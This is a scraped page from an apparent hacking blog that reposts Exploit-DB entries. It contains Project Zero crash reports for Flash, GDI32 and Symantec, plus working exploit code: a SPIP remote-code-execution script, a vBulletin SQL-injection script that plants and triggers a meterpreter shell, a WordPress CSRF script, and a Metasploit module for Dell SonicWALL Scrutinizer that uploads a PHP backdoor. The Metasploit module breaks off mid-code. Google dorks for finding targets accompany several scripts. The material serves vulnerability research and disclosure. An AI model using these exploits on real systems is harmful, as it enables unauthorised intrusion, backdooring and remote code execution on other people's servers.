Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=760
The attached mp4 file causes stack corruption in flash. To load, put LoadMP42.swf on a server and load http://127.0.0.1/LoadMP42.swf?file=t.mp4.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39828.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123186
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=799
There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.
A minimal PoC is as follows:
function myfunc(){
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
super(1000, 1000);
}
function mysubclass(){
this.watch("name", myfunc);
_global.ASnative(2204, 200)(this); // FileReference constructor
this.unwatch("name"); // let the reference free
}
}
var a = new subclass();
a = 0;
// wait for GC
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39829.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=801
There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.
A minimal PoC follows:
var t = this.createEmptyMovieClip( "t", 1);
t.watch("a", func);
t.addProperty("a", func, func);
function func(){
trace("a");
}
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39830.zip
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:"/spip.php?page=login"
# Date: 19/06/2023
# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)
# Vendor Homepage: https://www.spip.net/
# Software Link: https://files.spip.net/spip/archives/
# Version: < 4.2.1 (Except few fixed versions indicated in the description)
# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
# CVE reference : CVE-2023-27372 (coiffeur)
# CVSS : 9.8 (Critical)
#
# Vulnerability Description:
#
# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
#
# Usage: python3 CVE-2023-27372.py http://example.com
import argparse
import bs4
import html
import requests
def parseArgs():
parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
return parser.parse_args()
def get_anticsrf(url):
r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
soup = bs4.BeautifulSoup(r.text, 'html.parser')
csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
if csrf_input:
csrf_value = csrf_input['value']
if options.verbose:
print("[+] Anti-CSRF token found : %s" % csrf_value)
return csrf_value
else:
print("[-] Unable to find Anti-CSRF token")
return -1
def send_payload(url, payload):
data = {
"page": "spip_pass",
"formulaire_action": "oubli",
"formulaire_action_args": csrf,
"oubli": payload
}
r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
if options.verbose:
print("[+] Execute this payload : %s" % payload)
return 0
if __name__ == '__main__':
options = parseArgs()
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
csrf = get_anticsrf(url=options.url)
send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))
CVE-2014-2022 - vbulletin 4.x - SQLi in breadcrumbs via xmlrpc API (post-auth)
==============================================================================
Overview
--------
date : 10/12/2014
cvss : 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) base
cwe : 89
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x (to date); verified <= 4.2.2
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
patch availability (to date) : None
Abstract
---------
vBulletin 4 does not properly sanitize parameters to breadcrumbs_create allowing
an attacker to inject arbitrary SQL commands (SELECT).
risk: rather low - due to the fact that you the api key is required
you can probably use CVE-2014-2023 to obtain the api key
Details
--------
vulnerable component:
./includes/api/4/breadcrumbs_create.php
vulnerable argument:
conceptid
which is sanitized as TYPE_STRING which does not prevent SQL injections.
Proof of Concept (PoC)
----------------------
see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022
1) prerequisites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder)
Note: meterpreter_bind_tcp is not provided
run PoC, wait for SUCCESS! message
Note: poc will trigger meterpreter shell
meterpreter PoC scenario requires the mysql user to have write permissions
which may not be the case in some default installations.
Timeline
--------
2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
Contact
--------
tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022
(0x721427D8)
- - -
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib
class Exploit(object):
baseurl = None
cookies = None
def __init__(self,baseurl,params, debuglevel=1):
self.cookies = cookielib.LWPCookieJar()
handlers = [
urllib2.HTTPHandler(debuglevel=debuglevel),
urllib2.HTTPSHandler(debuglevel=debuglevel),
urllib2.HTTPCookieProcessor(self.cookies)
]
self.browser = urllib2.build_opener(*handlers)
self.baseurl=baseurl
self.params = params
def call(self,path="",data={}):
assert(isinstance(data,dict))
data = urllib.urlencode(data)
req = urllib2.Request("%s%s"%(self.baseurl,path),data)
req.add_header("Content-Type", "application/x-www-form-urlencoded")
return self.browser.open(req)
def call_json(self,path=None,data={}):
try:
x=self.call(path,data).read()
print "raw_response", x
resp = json.loads(x)
except urllib2.HTTPError, he:
resp = he.read()
return resp
def vb_init_api(self):
params = {'api_m':'api_init'}
params.update(self.params)
data = self.call_json("?%s"%(urllib.urlencode(params)))
self.session = data
return data
def vb_call(self, params):
api_sig = self._vb_build_api_sig(params)
req_params = self._vb_build_regstring(api_sig)
params.update(req_params)
data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
if not isinstance(data, dict):
return data
if 'errormessage' in data['response'].keys():
raise Exception(data)
return data
def _ksort(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( "%s=%s"%(key,value))
return "&".join(ret)
def _ksort_urlencode(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( urllib.urlencode({key:value}))
return "&".join(ret)
def _vb_build_api_sig(self, params):
apikey = self.params['apikey']
login_string = self._ksort_urlencode(params)
access_token = str(self.session['apiaccesstoken'])
client_id = str(self.session['apiclientid'])
secret = str(self.session['secret'])
return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
def _vb_build_regstring(self, api_sig):
params = {
'api_c':self.session['apiclientid'],
'api_s':self.session['apiaccesstoken'],
'api_sig':api_sig,
'api_v':self.session['apiversion'],
}
return params
if __name__=="__main__":
TARGET = "http://192.168.220.131/vbb4/api.php"
APIKEY = "4FAVcRDc"
REMOTE_SHELL_PATH = "/var/www/myShell.php"
TRIGGER_URL = "http://192.168.220.131/myShell.php"
DEBUGLEVEL = 0 # 1 to enable request tracking
### 2. sqli - simple - write outfile
print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
params = {'clientname':'fancy_exploit_client',
'clientversion':'1.0',
'platformname':'exploit',
'platformversion':'1.5',
'uniqueid':'1234',
'apikey':APIKEY}
x = Exploit(baseurl=TARGET,params=params)
vars = x.vb_init_api()
print vars
'''
x.vb_call(params={'api_m':'breadcrumbs_create',
'type':'t',
#'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
})
print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
'''
### 3. sqli - put meterpreter shell and trigger it
print "[ 3 ] - sqli - meterpreter shell + trigger"
with open("./meterpreter_bind_tcp") as f:
shell = f.read()
shell = shell.replace("<?php","").replace("?>","") #cleanup tags
shell = shell.encode("base64").replace("\n","") #encode payload
shell = "<?php eval(base64_decode('%s')); ?>"%shell # add decoderstub
shell = "0x"+shell.encode("hex") # for mysql outfile
x.vb_call(params={'api_m':'breadcrumbs_create',
'type':'t',
'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST=<TARGET_IP> E"
print "[ *] shell active ... waiting for it to die ..."
print urllib2.urlopen(TRIGGER_URL)
print "[ ] shell died!"
print "-- quit --"
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320
import requests
import hashlib
import time
# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"
# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()
# Set the data payload
payload = {
"wpss_nonce": nonce,
"wpss_setting_1": "value_1",
"wpss_setting_2": "value_2",
# Add additional settings as needed
}
# Set the request headers
headers = {
"User-Agent": user_agent,
"Referer": url,
"Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
# Add additional headers as needed
}
# Send the POST request
response = requests.post(url, data=payload, headers=headers)
# Check the response status code
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=731
Two of the escape codes supported by the public ExtEscape() API are POSTSCRIPT_IDENTIFY and POSTSCRIPT_INJECTION, which are only processed if the Device Context is associated with a printer. In the code responsible for handling the two escape codes, we can find the following constructs:
--- cut ---
.text:7DAE3E9F mov ecx, [ebp+cjInput]
.text:7DAE3EA2 lea eax, [ecx+1Ah]
.text:7DAE3EA5 add ecx, 17h
.text:7DAE3EA8 cmp eax, ecx
.text:7DAE3EAA jb loc_7DAD19AD
.text:7DAE3EB0 and eax, 0FFFFFFFCh
.text:7DAE3EB3 mov [ebp+Size], eax
.text:7DAE3EB9 push [ebp+Size] ; Size
.text:7DAE3EBF mov eax, large fs:18h
.text:7DAE3EC5 mov eax, [eax+30h]
.text:7DAE3EC8 push 0 ; Flags
.text:7DAE3ECA push dword ptr [eax+18h] ; HeapHandle
.text:7DAE3ECD call ds:__imp__RtlAllocateHeap@12 ; RtlAllocateHeap(x,x,x)
...
.text:7DAE3EEF mov eax, [ebp+cjInput]
.text:7DAE3EF2 push eax ; Size
.text:7DAE3EF3 mov [esi+10h], eax
.text:7DAE3EF6 lea eax, [esi+14h]
.text:7DAE3EF9 push edi ; Src
.text:7DAE3EFA push eax ; Dst
.text:7DAE3EFB call _memcpy
--- cut ---
which can be translated to the following C-like pseudocode (assuming 32-bit wide types):
--- cut ---
if (cjInput + 26 > cjInput > 23) {
buffer = Allocate((cjInput + 26) & ~4);
...
memcpy(buffer + 20, lpInData, cjInput);
...
}
--- cut ---
From the code snippet shown above, it is clear that while it checks for a possible integer overflow between cjInput+23 and cjInput+26, it does not check if the "+23" part overflows the 32-bit type or not. As a consequence, if cjInput is set to anywhere between -23 and -1, a small heap-based buffer will be allocated (<30 bytes) and the function will try to copy ~4GB of data into it, leading to an obvious buffer overflow condition.
Under normal circumstances, the problem can only be triggered with an unusually large value of the cjInput parameter, which is unlikely to be used by a programmer. However, EMF (Enhanced Windows Metafile) files can act as remote proxy for DrawEscape() (via EMR_DRAWESCAPE) and ExtEscape() (via EMR_EXTESCAPE) calls. Interestingly, the corresponding MRESCAPE::bCheckRecord() record verification routine doesn't ensure that the cjInput value is valid (i.e. that enough input data is actually present in the record). As a result, a specially crafted EMF file can pass any controlled value as cjInput, thus potentially /lying/ to ExtEscape() about the number of input bytes. Lack of cjInput sanitization in MRESCAPE::bCheckRecord() is therefore believed to be the culprit of the bug (regardless of the integer overflow in ExtEscape()).
While this is just one example of what an arbitrary cjInput parameter passed to DrawEscape() / ExtEscape() may lead to, we suspect that it could also have other security implications, e.g. if any of the functions trust cjInput and read beyond the record buffer, and then use the data in such a way that it is possible to retrieve it back in the client (like Internet Explorer), then it could be used as a memory disclosure primitive.
As previously mentioned, the bug only reproduces when the destination HDC is associated with a printer. After a brief search I haven't found a vector to achieve this using existing Windows client applications supporting the EMF format (such as IE), so I've developed a short dedicated program to demonstrate the problem (poc.cc), which boils down to the following API calls:
--- cut ---
HDC hdc = CreateDC("WINSPOOL", "Fax", NULL, NULL);
HENHMETAFILE hemf = GetEnhMetaFile("poc.emf");
RECT rect = {0, 0, 100, 100};
PlayEnhMetaFile(hdc, hemf, &rect);
--- cut ---
Upon compiling it and starting with the enclosed poc.emf file in the current working directory, the expected crash is generated in memcpy():
--- cut ---
(353c.fa4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003300e7 ebx=004ffbe8 ecx=3ffffc39 edx=00000003 esi=00331000 edi=00500c1c
eip=779823a3 esp=0028fb34 ebp=0028fb3c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
ntdll!memcpy+0x33:
779823a3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr Args to Child
0028fb3c 771a3f00 004ffd04 003300e8 ffffffff ntdll!memcpy+0x33
0028fd98 771c3fa9 bc21881a 00001015 ffffffff GDI32!ExtEscape+0x431
0028fdbc 77194e17 bc21881a 004f9588 00000004 GDI32!MRESCAPE::bPlay+0x32
0028fe34 7719ca93 bc21881a 004f9588 003300d8 GDI32!PlayEnhMetaFileRecord+0x2c5
0028febc 7719caf2 bc21881a 423d5f3a 00000000 GDI32!bInternalPlayEMF+0x66b
0028fed8 00401479 bc21881a b6467a1d 0028fef8 GDI32!PlayEnhMetaFile+0x32
WARNING: Stack unwind information not available. Following frames may be wrong.
0028ff18 004010fd 0028ff28 75949e34 7efde000 image00400000+0x1479
0028ff94 77999882 7efde000 4f2b9f18 00000000 image00400000+0x10fd
0028ffd4 77999855 00401280 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
0028ffec 00000000 00401280 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
The bug has been reproduced on a fully patched Windows 7 64-bit with a 32-bit POC program, but the 64-bit build of gdi32.dll also seems to be affected.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39834.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=820
When parsing executables packed by an early version of aspack, a buffer overflow can occur in the core Symantec Antivirus Engine used in most Symantec and Norton branded Antivirus products. The problem occurs when section data is truncated, that is, when SizeOfRawData is greater than SizeOfImage.
This is a remote code execution vulnerability. Because Symantec use a filter driver to intercept all system I/O, just emailing a file to a victim or sending them a link is enough to exploit it.
On Linux, Mac and other UNIX platforms, this results in a remote heap overflow as root in the Symantec or Norton process. On Windows, this results in kernel memory corruption, as the scan engine is loaded into the kernel (wtf!!!), making this a remote ring0 memory corruption vulnerability - this is about as bad as it can possibly get.
The obvious way to exploit this flaw is either via email or a web browser. The attached testcase contains the source code to build a PoC, which should BugCheck (i.e. BSOD) a system with Norton Antivirus installed, or crash Symantec Enterprise Endpoint service.
The file testcase.txt is a prebuilt binary (note that file extension is irrelevant here). Just clicking download should be enough to trigger a kernel panic on a vulnerable system (!!!).
When this file touches disk, Symantec will allocate SizeOfImage bytes and then memcpy all available data into the buffer from the truncated section resulting in heap or pool corruption. Effectively, we can get Symantec to execute a sequence like this:
char *buf = malloc(SizeOfImage);
memcpy(&buf[DataSection->VirtualAddress],
DataSection->PointerToRawData,
SectionSizeOnDisk);
All of these values, and all the data is under attacker control, making this a very clean overflow. Because this vulnerability exists in the core scan engine, the majority of Symantec products are vulnerable, this includes:
* Symantec Endpoint Antivirus (All platforms)
* Norton Antivirus (All platforms)
* Symantec Scan Engine (All platforms)
* Symantec Email Security (All platforms)
* ..and probably all other Symantec Antivirus products.
On Windows with Symantec Endpoint Antivirus, this vulnerability permits code execution as NT AUTHORITY\SYSTEM in the ccSvcHost.exe process. On Norton Antivirus for Windows, this code is loaded into the kernel and results kernel pool corruption.
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 9e45c000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 82a81ff3, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
WRITE_ADDRESS: 9e45c000 Paged pool
FAULTING_IP:
nt!memcpy+33
82a81ff3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: NS.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
TRAP_FRAME: 9abd2094 -- (.trap 0xffffffff9abd2094)
ErrCode = 00000002
eax=b0849800 ebx=00010000 ecx=00001201 edx=00000000 esi=b0844ffc edi=9e45c000
eip=82a81ff3 esp=9abd2108 ebp=9abd2110 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
nt!memcpy+0x33:
82a81ff3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER: from 82b28ce7 to 82ac4308
1: kd> .trap 0xffffffff9abd2094
ErrCode = 00000002
eax=b0849800 ebx=00010000 ecx=00001201 edx=00000000 esi=b0844ffc edi=9e45c000
eip=82a81ff3 esp=9abd2108 ebp=9abd2110 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
nt!memcpy+0x33:
82a81ff3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
1: kd> db esi
b0844ffc 54 65 73 74 69 6e 67 53-79 6d 61 6e 74 65 63 45 TestingSymantecE
b084500c 78 70 6c 6f 69 74 54 65-73 74 69 6e 67 53 79 6d xploitTestingSym
b084501c 61 6e 74 65 63 45 78 70-6c 6f 69 74 54 65 73 74 antecExploitTest
b084502c 69 6e 67 53 79 6d 61 6e-74 65 63 45 78 70 6c 6f ingSymantecExplo
b084503c 69 74 54 65 73 74 69 6e-67 53 79 6d 61 6e 74 65 itTestingSymante
b084504c 63 45 78 70 6c 6f 69 74-54 65 73 74 69 6e 67 53 cExploitTestingS
b084505c 79 6d 61 6e 74 65 63 45-78 70 6c 6f 69 74 54 65 ymantecExploitTe
b084506c 73 74 69 6e 67 53 79 6d-61 6e 74 65 63 45 78 70 stingSymantecExp
1: kd> lmv mNAVEX15
start end module name
a1a1f000 a1bad180 NAVEX15 (no symbols)
Loaded symbol image file: NAVEX15.SYS
Image path: \??\C:\Program Files\Norton Security\NortonData\22.6.0.142\Definitions\VirusDefs\20160506.004\NAVEX15.SYS
Image name: NAVEX15.SYS
Timestamp: Tue Oct 13 17:32:30 2015 (561DA29E)
CheckSum: 00195B98
ImageSize: 0018E180
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
The testcase attached produces an executable like this:
NAME RVA VSZ RAW_SZ RAW_PTR nREL REL_PTR nLINE LINE_PTR FLAGS
.data fff8 0 ffffffff 2000 0 0 0 0 0 ---
.text fff8 0 1000 1000 0 0 0 0 0 ---
Source code is included.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39835.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
WINDOWS = /^win/i
LINUX = /linux/i
def initialize(info={})
super(update_info(info,
'Name' => "Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail
parameter in exporters.php allows an attacker to write arbitrary files to the file system
with an SQL Injection attack, and gain remote code execution under the context of SYSTEM
for Windows, or as Apache for Linux.
Authentication is required to exploit this vulnerability, but this module uses
the default admin:admin credential.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry', # Original discovery, PoC, and Metasploit module
'sinn3r' # Metasploit module for native support
],
'References' =>
[
[ 'CVE', '2014-4977' ],
[ 'BID', '68495' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Jul/44' ],
[ 'URL','https://gist.github.com/brandonprry/76741d9a0d4f518fe297' ]
],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'Automatic', {} ],
[
'Dell SonicWALL Scrutinizer 11.01 on Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[
'Dell SonicWALL Scrutinizer 11.01 Linux Appliance',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 24 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'admin' ])
], self.class)
end
# Prints a message with the target's IP and port.
#
# @param msg [String] Message to print.
# @return [void]
def print_status(msg='')
super("#{peer} - #{msg}")
end
# Prints an error message with the target's IP and port.
#
# @param msg [String] Message to print.
# @return [void]
def print_error(msg='')
super("#{peer} - #{msg}")
end
# Pads NULL columns for a SQL injection string.
#
# @param n [Fixnum] Number of nulls
# @return [String]
def pad_null(n)
padding = []
n.times do
padding << 'NULL'
end
padding * ','
end
# Checks (explicitly) the target for the vulnerability. To be able to check this, a
# valid username/password is required.
#
# @return [void]
def check
begin
res = do_login
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
uid = res['userid']
sid = res['sessionid']
pattern = Rex::Text.rand_text_alpha(10)
sqli_str = "-6045 UNION ALL SELECT '#{pattern}',#{pad_null(19)}"
res = do_sqli(sqli_str, sid, uid).get_json_document
return Exploit::CheckCode::Vulnerable if res['id'].to_s == pattern
Exploit::CheckCode::Safe
end
# Returns the OS information by using @@version_compile_os.
#
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [String] The OS information.
def get_os(sid, uid)
sqli_str = "-6045 UNION ALL SELECT @@version_compile_os,#{pad_null(19)}"
res = do_sqli(sqli_str, sid, uid).get_json_document
res['id']
end
# Returns target's d4d directory path that will be used to upload our malicious files.
#
# @param os [String] OS information.
# @return [String]
def get_d4d_path(os)
case os
when WINDOWS
# On Windows, the full d4d path looks something like this:
# C:\Program Files\Scrutinizer\html\d4d
'../../html/d4d'
when LINUX
# On the Linux appliance, the d4d path looks exactly like this:
'/home/plixer/scrutinizer/html/d4d'
end
end
# Logs into Dell SonicWALL Scrutinizer.
#
# @return [Hash] JSON response.
def do_login
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
unless res
fail_with(Failure::Unknown, 'The connection timed out while attempting to log in.')
end
res = res.get_json_document
if res['noldapnouser']
fail_with(Failure::NoAccess, "Username '#{datastore['USERNAME']}' is incorrect.")
elsif res['loginfailed']
fail_with(Failure::NoAccess, "Password '#{datastore['PASSWORD']}' is incorrect.")
end
report_cred(datastore['USERNAME'], datastore['PASSWORD'])
res
end
# Saves a valid username/password to database.
#
# @param username [String]
# @param password [String]
# @return [void]
def report_cred(username, password)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
# Injects malicious SQL string to the methodDetail parameter against the target machine.
#
# @param method_detail [String] Malicious SQL injection string.
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [Rex::Proto::Http::Response]
def do_sqli(method_detail, sid, uid)
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
'vars_get' => { 'methodDetail'=> method_detail },
'cookie' => "cookiesenabled=1;sessionid=#{sid};userid=#{uid}"
})
unless res
fail_with(Failure::Unknown, 'The connection timed out for exporters.php.')
end
res
end
# Returns a PHP backdoor that is to be uploaded onto the target machine.
#
# @param os [String] Target OS information.
# @param target_path [String]
# @return [String] PHP backdoor
def get_php_backdoor(os)
case os
when WINDOWS
chmod_code = %Q|chmod($bname, 0777);|
exec_code = %Q|exec($bname);|
when LINUX
chmod_code = %Q|chmod("./" . $bname, 0777);|
exec_code = %Q|exec("./" . $bname);|
end
%Q|<?php
$bname = basename( $_FILES['uploadedfile']['name']);
$target_path = "./" . $bname;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path);
#{chmod_code}
#{exec_code}
?>
|.gsub(/\x20{4}/, ' ')
end
# Uploads the executable payload via malicious PHP backdoor.
#
# @param backdoor_fname [String] Name of the backdoor
# @param payload_fname [String] Name of the executable payload
# @return [void]
def upload_payload(backdoor_fname, payload_fname)
p = generate_payload_exe(
code: payload.encoded,
platform: @my_target.platform,
arch: @my_target.arch
)
print_status("Uploading #{payload_fname} (#{p.length} bytes)...")
post_data = Rex::MIME::Message.new
post_data.add_part(
p,
'application/octet-stream',
'binary',
"form-data; name=\"uploadedfile\"; filename=\"#{payload_fname}\""
)
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/d4d/#{backdoor_fname}"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => data
})
unless res
# Here we are not using fail_with, because when we get a session, it seems to be creating
# the same effect as connection hanging... and then eventually times out. If that
# happens, a fail_with() can cause msfconsole to believe there is no session created.
vprint_status('Connection timed out while uploading payload.')
return
end
if res.code == 404
fail_with(Failure::Unknown, "Server returned 404 for #{backdoor_fname}.")
end
end
# Uploads the PHP backdoor onto the target machine. The reason of using a PHP backdoor to upload
# is because our SQL injection is in a GET method, and Apache has a max length of 8190 bytes,
# which is bad for some built-in or custom payloads.
#
# @param opts [Hash]
# @option opts [String] :d4d_path
# @option opts [String] :backdoor_fname
# @option opts [String] :payload_fname
# @option opts [String] :sid
# @option opts [String] :uid
# @option opts [String] :os
# @return [void]
def upload_php_backdoor(opts)
d4d_path = opts[:d4d_path]
backdoor_fname = opts[:backdoor_fname]
payload_fname = opts[:payload_fname]
sid = opts[:sid]
uid = opts[:uid]
os = opts[:os]
print_status("Injecting a PHP upload backdoor (#{backdoor_fname})...")
hex_backdoor = get_php_backdoor(os).unpack("H*")[0]
sqli_str = "-6045 UNION ALL SELECT 0x#{hex_backdoor},#{pad_null(19)} INTO DUMPFILE '#{d4d_path}/#{backdoor_fname}' #"
do_sqli(sqli_str, sid, uid)
end
# Attempts a SQL injection attack against the target machine.
#
# @param os [String] OS information.
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [void]
def do_backdoor_sqli(os, sid, uid)
backdoor_fname = "#{Rex::Text.rand_text_alpha(6)}.php"
payload_fname = Rex::Text.rand_text_alpha(5)
payload_fname << '.exe' if @my_target['Platform'].match(WINDOWS)
d4d_path = get_d4d_path(os)
register_files_for_cleanup(backdoor_fname, payload_fname)
opts = {
d4d_path: d4d_path,
